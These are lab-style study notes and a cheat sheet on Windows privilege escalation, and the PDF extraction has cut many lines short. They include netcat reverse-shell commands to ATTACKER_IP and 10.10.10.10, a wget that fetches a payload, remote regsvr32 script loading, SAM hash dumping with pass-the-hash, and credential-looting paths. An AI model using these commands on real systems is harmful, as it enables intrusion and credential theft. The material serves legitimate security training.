Windows Privilege Escalation
Windows Privilege Escalation
Windows Privilege Escalation
Windows Users
Windows systems mainly have two kinds of users. Depending on their access levels, we can
categorise a user in one of the following groups:
These users have the most privileges. They can change any system configuration
Administration parameter and access any file in the system.
These users can access the computer but only perform limited tasks. Typically
Standard User these users can not make permanent or essential changes to the system and
are limited to their files.
SYSTEM / LocalSystem
An account used by the operating system to perform internal tasks. It has full access to
all files and resources available on the host with even higher privileges than
administrators.
Local Service
Default account used to run Windows services with "minimum" privileges. It will use
anonymous connections over the network.
Network Service
Default account used to run Windows services with "minimum" privileges. It will use the
computer credentials to authenticate through the network.
1
Unattended Windows Installations
Places to Search for Passwords are:
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
PowerShell History
See PowerShell Commands History in CMD Using this Command
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShe
cmdkey /list
While you can't see the actual passwords, if you notice any credentials worth trying,
you can use them with the runas command and the /savecred option, as seen below.
2
IIS Configuration
C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\w
Scheduled Tasks
Looking into scheduled tasks on the target system, you may see a scheduled task that
either lost its binary or it's using a binary you can modify.
Scheduled tasks can be listed from the command line using the
schtasks command without any options
3
The "Task to Run" parameter which indicates what gets executed by the scheduled task, and
the "Run As User" parameter, which shows the user that will be used to execute the task.
icacls c:\tasks\schtask.bat
If our current user can modify or overwrite the "Task to Run" executable, We Will Set NC
Reverse Shell There
Here BUILTIN\Users her Full Permission So Lets Change the Bat file to Execute a Rev shell.
4
echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks
AlwaysInstallElevated
Windows installer files (also known as .msi files) are used to install applications on the
system. They usually run with the privilege level of the user that starts it. However, these can
be configured to run with higher privileges from any user account (even unprivileged ones).
This could potentially allow us to generate a malicious MSI file that would run with admin
privileges.
5
Note: The AlwaysInstallElevated method won't work on this
room's machine and it's included as information only.
This method requires two registry values to be set. You can query these from the command
line using the commands below.
To be able to exploit this vulnerability, both should be set. Otherwise, exploitation will not be
possible. If these are set, you can generate a malicious .msi file using msfvenom, as seen
below:
As this is a reverse shell, you should also run the Metasploit Handler module configured
accordingly. Once you have transferred the file you have created, you can run the installer
with the command below and receive the reverse shell:
So All Services have Executable Assigned to the services and to change them or make
any edit we need to Edit Discretionary Access Control List (DACL)
Which Basically Help With Permissions to Start , Stop , Restart , Query config or
Reconfig The Service.
Here we can see that the associated executable is specified through the
BINARY_PATH_NAME parameter, and the account used to run the service is
shown on the SERVICE_START_NAME parameter.
6
C:\> sc qc apphostsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: apphostsvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\system32\svchost.ex
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Application Host Helper Servic
DEPENDENCIES :
SERVICE_START_NAME : localSystem
HKLM\SYSTEM\CurrentControlSet\Services\<service_name>
A subkey exists for every service in the system. Again, we can see the associated
executable on the ImagePath value and the account used to start the service on
the
7
ObjectName value. If a DACL has been configured for the service, it will be stored in a
subkey called Security. As you have guessed by now, only administrators can modify
such registry entries by default.
Insecure Permissions on Service Executable
If the executable associated with a service has weak permissions that allow an
attacker to modify or replace it, the attacker can gain the privileges of the service's
account trivially.
C:\> sc qc WindowsScheduler
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: windowsscheduler
TYPE : 10 WIN32_OWN_PR START_TYPE : 2
AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\PROGRA~2\SYST
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : System Scheduler
DEPENDENCIES :
SERVICE_START_NAME : .\svcuser1
8
Let’s See if we can modify this exe to run a Netcat Rev shell by
editing it.
To Check Permission on any file we use icacls
C:\Users\thm-unpriv>icacls C:\PROGRA~2\SYSTEM
C:\PROGRA~2\SYSTEM~1\WService.exe Everyone:(I
NT AUTHORIT BUILTIN\Adm BUILTIN\Use
APPLICATION APPLICATION
1st Create a exe file using msfvenom and uplaod on the machine
with wget
Attacker Machine
9
Victim Machine
wget http://ATTACKER_IP:8000/rev-svc.exe -O r
C:\> cd C:\PROGRA~2\SYSTEM~1\
Attacker machine
10
At Last Restart the service to execute the Exe file of Rev Shell we
created
Booooooommmmmmmmmmm
C:\Windows\system32>whoa
mi wprivesc1\svcusr1
GOOOOOOOOOOOOOT THEEEEEEEEEE
SHELLLLLLLLLLLLLLLLLLLLL
POC:::::::
11
12
Unquoted Service Paths
When we can't directly write into service executables as before, there might still be a
chance to force a service into running arbitrary executables by using a rather obscure
feature.
Example :
C:\> sc qc "vncserver"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: vncserver
TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2
AUTO_START
14
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : "C:\Program Files\RealVNC\VNC
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : VNC Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
SCM tries to execute the exe file but there is one problem >>
Whenever there is Spaces in the $PATH like The executable is
Present in Folder named ‘Service Server Files’ There is Space In
15
Between and here the SCM Get Confused and have multiple results
….. which can be manipulated by user to execute the malware exe
file to get Shells.
Let’s say you are a person who is read from starting and don’t
see Space or anything you just read alphabet to alphabet and
when it come a empty space i.e Space you get blank mind.
This same happed with it , but in this case it ignore the space
and then start reading the dir name again.
If We have Write Permission To the Directory
Let’s do it in prarticle:
C:\>icacls c:\MyPrograms
c:\MyPrograms NT AUTHORITY\SYSTEM:(I)(OI)
BUILTIN\Administrators:(I)( BUILTIN\Users:(I)
(OI)(CI)(R BUILTIN\Users:(I)(CI)(AD)
16
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(I
Now Let’s Move the Exe to the path !!!!!!!! IMP STEP
17
Restart the service
C:\Windows\system32>whoa
mi wprivesc1\svcusr2
POCCCCCCCCC
18
Insecure Service Permissions
What if we have permission to edit config file of The Service ?
We will have access to change the Exec File to anywhere we want !! Simple As Fuck <3
Let’s Do it in praticle
To Find Weather user is allowed to edit the permission or not We use a utility known as
Accesschk
Link to Accesschk : https://learn.microsoft.com/en-
us/sysinternals/downloads/accesschk
19
SERVICE_START
SERVICE_STOP
SERVICE_USER_DEFINED_CONTROL
READ_CONTROL
[4] ACCESS_ALLOWED_ACE_TYPE:
BUILTIN\Users SERVICE_ALL_ACCESS
20
Privileges are Right to do a task , example you are not allowed to change your bed according
to you as your more dont allow you ;) Joke apart Its a Right to do any task for write to it.
whoami /priv
SeBackup / SeRestore
C:\Windows\system32>whoami /priv
PRIVILEGES
INFORMATION -----------
-----------
Privilege Name Description
============================= ===============
SeBackupPrivilege Back up files a
SeRestorePrivilege Restore files a
SeShutdownPrivilege Shut down the s
SeChangeNotifyPrivilege Bypass traverse
SeIncreaseWorkingSetPrivilege Increase a proc
C:\Windows\system32>
21
As we see we have Sebackup/SeRestore Perm.
mkdir share
impacket-smbserver -smb2support -username THM
22
Administrator:500:aad3b435b51404eeaad3b435b51
Guest:501:aad3b435b51404eeaad3b435b51404ee:31
DefaultAccount:503:aad3b435b51404eeaad3b435b5
WDAGUtilityAccount:504:aad3b435b51404eeaad3b4
THMBackup:1008:aad3b435b51404eeaad3b435b51404
THMTakeOwnership:1009:aad3b435b51404eeaad3b43 [*]
Cleaning up...
impacket-psexec -hashes
aad3b435b51404eeaad3b Impacket v0.11.0 -
Copyright 2023 Fortra
C:\Windows\system32>
23
POCCCCCCCCCC:
SeTakeOwnership
The SeTakeOwnership privilege allows a user to take ownership of any object on the
system, including files and registry keys, opening up many possibilities for an
attacker to elevate privileges
C:\Windows\system32>whoami /priv
PRIVILEGES
INFORMATION -----------
-----------
Privilege Name Description
24
=============================
=============== SeTakeOwnershipPrivilege Take
ownership SeChangeNotifyPrivilege Bypass
traverse SeIncreaseWorkingSetPrivilege Increase
a proc
C:\Windows\system32>
C:\Windows\system32>takeown /f C:\Windows\Sys
C:\Windows\system32>
As now we are owner let’s give ourself all perm to edit change this
file
C:\Windows\system32>icacls C:\Windows\System3
processed file: C:\Windows\System32\Utilman.e
Successfully processed 1 files; Failed proces
25
C:\Windows\system32>
C:\Windows\system32>copy Utilman.exe
cmd.exe Overwrite cmd.exe? (Yes/No/All): All
Access is denied.
0 file(s) copied.
C:\Windows\system32>
Now Le’s Run this Utliman For this we need to lock the screen and
Run this from Screen Ascess 😒
SeImprsonate / SeAssignPrimaryToken
26
To use RogueWinRM, we first need to upload the exploit to the
target machine. For your convenience, this has already been done,
and you can find the exploit in the C:\tools\ folder.
The RogueWinRM exploit is possible because whenever a user
(including unprivileged users) starts the BITS service in Windows, it
automatically creates a connection to port 5985 using SYSTEM
privileges. Port 5985 is typically used for the WinRM service, which
is simply a port that exposes a Powershell console to be used
remotely through the network. Think of it like SSH, but using
Powershell.
If, for some reason, the WinRM service isn't running on the victim
server, an attacker can start a fake WinRM service on port 5985 and
catch the authentication attempt made by the BITS service when
starting. If the attacker has SeImpersonate privileges, he can execute
any command on behalf of the connecting user, which is SYSTEM.
c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\too
27
Now Just need to Listen to Port 4442
You can use the wmic tool to list software installed on the target
system and its versions.
28
Windows - Privilege Escalation
Summary
Tools
Windows Version and Configuration
User Enumeration
Network Enumeration
Antivirus Enumeration
Default Writeable Folders
EoP - Looting for passwords
SAM and SYSTEM files
HiveNightmare
LAPS Settings
Search for file contents
Search for a file with a certain filename
Search the registry for key names and passwords
Passwords in unattend.xml
Wifi passwords
Sticky Notes passwords
Passwords stored in services
Passwords stored in Key Manager
Powershell History
Powershell Transcript
Password in Alternate Data Stream
EoP - Processes Enumeration and Tasks
EoP - Incorrect permissions in services
EoP - Windows Subsystem for Linux (WSL)
EoP - Unquoted Service Paths
EoP - $PATH Interception
EoP - Named Pipes
EoP - Kernel Exploitation
EoP - Microsoft Windows Installer
AlwaysInstallElevated
CustomActions
EoP - Insecure GUI apps
EoP - Evaluating Vulnerable Drivers
EoP - Printers
Universal Printer
Bring Your Own Vulnerability
EoP - Runas
EoP - Abusing Shadow Copies
EoP - From local administrator to NT SYSTEM
EoP - Living Off The Land Binaries and Scripts
EoP - Impersonation Privileges
Restore A Service Account's Privileges
Meterpreter getsystem and alternatives
RottenPotato (Token Impersonation)
Juicy Potato (Abusing the golden privileges)
Rogue Potato (Fake OXID Resolver))
EFSPotato (MS-EFSR EfsRpcOpenFileRaw))
EoP - Privileged File Write
DiagHub
UsoDLLLoader
WerTrigger
WerMgr
EoP - Common Vulnerabilities and Exposures
MS08-067 (NetAPI)
MS10-015 (KiTrap0D)
MS11-080 (adf.sys)
MS15-051 (Client Copy Image)
MS16-032
MS17-010 (Eternal Blue)
CVE-2019-1388
EoP - $PATH Interception
References
Tools
PowerSploit's PowerUp
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-system
wmic qfe
Architecture
set
Get-ChildItem Env: | ft Key,Value
User Enumeration
Get current username
whoami /priv
whoami /groups
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
net accounts
net localgroup
Get-LocalGroup | ft Name
nltest /DCLIST:DomainName
nltest /DCNAME:DomainName
nltest /DSGETDC:DomainName
Network Enumeration
List all network interfaces, IP, and DNS.
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
netstat -ano
net share
powershell Find-DomainShare -ComputerDomain domain.local
SNMP Configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
Antivirus Enumeration
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\spool\printers
C:\Windows\System32\spool\servers
C:\Windows\tracing
C:\Windows\Temp
C:\Users\Public
C:\Windows\Tasks
C:\Windows\System32\tasks
C:\Windows\SysWOW64\tasks
C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system
C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system
C:\Windows\debug\wia
C:\Windows\registration\crmlog
C:\Windows\System32\com\dmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\System32\fxstmp
C:\Windows\SysWOW64\fxstmp
HiveNightmare
CVE-2021–36934 allows you to retrieve all registry hives (SAM,SECURITY,SYSTEM) in Windows 10
and 11 as a non-administrator user
Then exploit the CVE by requesting the shadowcopies on the filesystem and reading the hives from it.
LAPS Settings
Extract HKLM\Software\Policies\Microsoft Services\AdmPwd from Windows Registry.
Passwords in unattend.xml
Location of the unattend.xml files.
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
Display the content of these files with dir /s *sysprep.inf *sysprep.xml *unattended.xml
*unattend.xml *unattend.txt 2>nul .
Example content
<UserAccounts>
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>*SENSITIVE*DATA*DELETED*</Password>
<Group>administrators;users</Group>
<Name>Administrateur</Name>
</LocalAccount>
</LocalAccounts>
</UserAccounts>
Unattend credentials are stored in base64 and can be decoded manually with base64.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
Other files
%SYSTEMDRIVE%\pagefile.sys
%WINDIR%\debug\NetSetup.log
%WINDIR%\repair\sam
%WINDIR%\repair\system
%WINDIR%\repair\software, %WINDIR%\repair\security
%WINDIR%\iis6.log
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
%WINDIR%\System32\drivers\etc\hosts
C:\ProgramData\Configs\*
C:\Program Files\Windows PowerShell\*
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
Wifi passwords
Find AP SSID
Oneliner method to extract wifi passwords from all the access point.
cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "'
Sticky Notes passwords
The sticky notes app stores it's content in a sqlite db located at C:\Users\
<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlit
e
https://tinyurl.com/2cdzl9hw
Import-Module path\to\SessionGopher.ps1;
Invoke-SessionGopher -AllDomain -o
Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
rundll32 keymgr,KRShowKeyMgr
Powershell History
Disable Powershell history: Set-PSReadlineOption -HistorySaveStyle SaveNothing .
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_hist
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw
Powershell Transcript
C:\Users\<USERNAME>\Documents\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
C:\Transcripts\<DATE>\PowerShell_transcript.<HOSTNAME>.<RANDOM>.<TIMESTAMP>.txt
tasklist /v
net start
sc query
Get-Service
Get-Process
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} |
List services
net start
wmic service list brief
tasklist /SVC
Startup tasks
DLL Hijacking
# content of windows_dll.c
#include <windows.h>
BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
if (dwReason == DLL_PROCESS_ATTACH) {
system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
ExitProcess(0);
}
return TRUE;
}
Note to check file permissions you can use cacls and icacls
You are looking for BUILTIN\Users:(F) (Full access), BUILTIN\Users:(M) (Modify access) or
BUILTIN\Users:(W) (Write-only access) in the output.
SERVICE_NAME: usosvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
With root privileges Windows Subsystem for Linux (WSL) allows users to create a bind shell on
any port (no elevation needed). Don't know the root password? No problem just set the default
user to root W/ .exe --default-user root. Now start your bind shell or reverse.
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMo
...
[*] Checking for unquoted service paths...
ServiceName : BBSvc
Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath>
...
# automatic exploit
Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4
Example
For C:\Program Files\something\legit.exe , Windows will try the following paths first:
C:\Program.exe
C:\Program Files.exe
EXAMPLE:
Because (in this example) "C:\Program Files\nodejs" is before "C:\WINDOWS\system32" on the PATH
variable, the next time the user runs "cmd.exe", our evil version in the nodejs folder will run, instead of
the legitimate one in the system32 folder.
MS17-017 [KB4013081] [GDI Palette Objects Local Privilege Escalation] (windows 7/8)
CVE-2017-8464 [LNK Remote Code Execution Vulnerability] (windows
10/8.1/7/2016/2010/2008)
CVE-2017-0213 [Windows COM Elevation of Privilege Vulnerability] (windows
10/8.1/7/2016/2010/2008)
CVE-2018-0833 [SMBv3 Null Pointer Dereference Denial of Service] (Windows 8.1/Server 2012
R2)
CVE-2018-8120 [Win32k Elevation of Privilege Vulnerability] (Windows 7 SP1/2008 SP2,2008 R2
SP1)
MS17-010 [KB4013389] [Windows Kernel Mode Drivers] (windows 7/2008/2003/XP)
MS16-135 [KB3199135] [Windows Kernel Mode Drivers] (2016)
MS16-111 [KB3186973] [kernel api] (Windows 10 10586 (32/64)/8.1)
MS16-098 [KB3178466] [Kernel Driver] (Win 8.1)
MS16-075 [KB3164038] [Hot Potato] (2003/2008/7/8/2012)
MS16-034 [KB3143145] [Kernel Driver] (2008/7/8/10/2012)
MS16-032 [KB3143141] [Secondary Logon Handle] (2008/7/8/10/2012)
MS16-016 [KB3136041] [WebDAV] (2008/Vista/7)
MS16-014 [K3134228] [remote code execution] (2008/Vista/7)
...
MS03-026 [KB823980] [Buffer Overrun In RPC Interface] (/NT/2000/XP/2003)
AlwaysInstallElevated
Using the reg query command, you can check the status of the AlwaysInstallElevated registry key
for both the user and the machine. If both queries return a value of 0x1 , then
AlwaysInstallElevated is enabled for both user and machine, indicating the system is vulnerable.
Shell command
PowerShell command
Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer
Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer
Metasploit : exploit/windows/local/always_install_elevated
PowerUp.ps1 : Get-RegistryAlwaysInstallElevated , Write-UserAddMSI
CustomActions
Custom Actions in MSI allow developers to specify scripts or executables to be run at various
points during an installation
mgeeky/msidump - a tool that analyzes malicious MSI installation packages, extracts files,
streams, binary data and incorporates YARA scanner.
activescott/lessmsi - A tool to view and extract the contents of an Windows Installer (.msi) file.
mandiant/msi-search - This tool simplifies the task for red team operators and security teams to
identify which MSI files correspond to which software and enables them to download the
relevant file.
Execute the repair process with the /fa parameter to trigger the CustomActions. We can use both
IdentifyingNumber {E0F1535A-8414-5EF1-A1DD-E17EDCDC63F1} or path to the installer
c:\windows\installer\XXXXXXX.msi . The repair will run with the NT SYSTEM account.
Missing quiet parameters: it will spawn conhost.exe as NT SYSTEM . Use [CTRL]+[A] to select
some text in it, it will pause the execution.
conhost -> properties -> "legacy console mode" Link -> Internet Explorer -> CTRL+O –>
cmd.exe
GUI with direct actions: open a URL and start the browser then use the same scenario.
Binaries/Scripts loaded from user writable paths: you might need to win the race condition.
DLL hijacking/search order abusing
PowerShell -NoProfile missing: Add custom commands into your profile
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click
to open Command Prompt"
Living Off The Land Drivers is a curated list of Windows drivers used by adversaries to bypass
security controls and carry out attacks. The project helps security professionals stay informed and
mitigate potential threats.
Native binary: DriverQuery.exe
matterpreter/OffensiveCSharp/DriverQuery
EoP - Printers
Universal Printer
Create a Printer
$serverName = 'dc.purple.lab'
$printerName = 'Universal Priv Printer'
$fullprinterName = '\\' + $serverName + '\' + $printerName + ' - ' + $(If ([System.Environment
Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue
Add-Printer -ConnectionName $fullprinterName
PrinterNightmare
cp_server.exe -e ACIDDAMAGE
# Get-Printer
# Set the "Advanced Sharing Settings" -> "Turn off password protected sharing"
cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE
cp_client.exe -l -e ACIDDAMAGE
EoP - Runas
cmdkey /list
Currently stored credentials:
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator
Then you can use runas with the /savecred options in order to use the saved credentials. The
following example is calling a remote binary via an SMB share.
PsExec.exe -i -s cmd.exe
The goal of the LOLBAS project is to document every binary, script, and library that can be used
for Living Off The Land techniques.
A LOLBin/Lib/Script must:
Be a Microsoft-signed file, either native to the OS or downloaded from Microsoft. Have extra
"unexpected" functionality. It is not interesting to document intended use cases. Exceptions are
application whitelisting bypasses
Have functionality that would be useful to an APT or red team
wmic.exe process call create calc
regsvr32 /s /n /u /i:https://tinyurl.com/2a8yook3 scrobj.dll
Microsoft.Workflow.Compiler.exe tests.xml results.xml
- SeBackupPrivilege (a
Built-in Read sensitve files robocopy) is not helpfu
SeBackup Threat
commands with robocopy /b when it comes to open
files.
- Robocopy requires bo
SeBackup and SeResto
work with /b paramete
Create arbitrary
3rd party token including local
SeCreateToken Admin
tool admin rights with
NtCreateToken .
Alternatively, the
privilege may be
used to unload
security-related
drivers with ftlMC
builtin command.
i.e.: fltMC
sysmondrv
1. Launch
PowerShell/ISE with
the SeRestore
privilege present.
Attack may be detected
2. Enable the
some AV software.
privilege with
Enable-
Alternative method reli
SeRestore Admin PowerShell SeRestorePrivilege).
on replacing service
3. Rename
binaries stored in "Prog
utilman.exe to
Files" using the same
utilman.old
privilege.
4. Rename cmd.exe
to utilman.exe
5. Lock the console
and press Win+U
1. takeown.exe /f
"%windir%\system32" Attack may be detected
2. icalcs.exe some AV software.
"%windir%\system32"
Built-in /grant Alternative method reli
SeTakeOwnership Admin
commands "%username%":F on replacing service
3. Rename cmd.exe binaries stored in "Prog
to utilman.exe Files" using the same
4. Lock the console privilege.
and press Win+U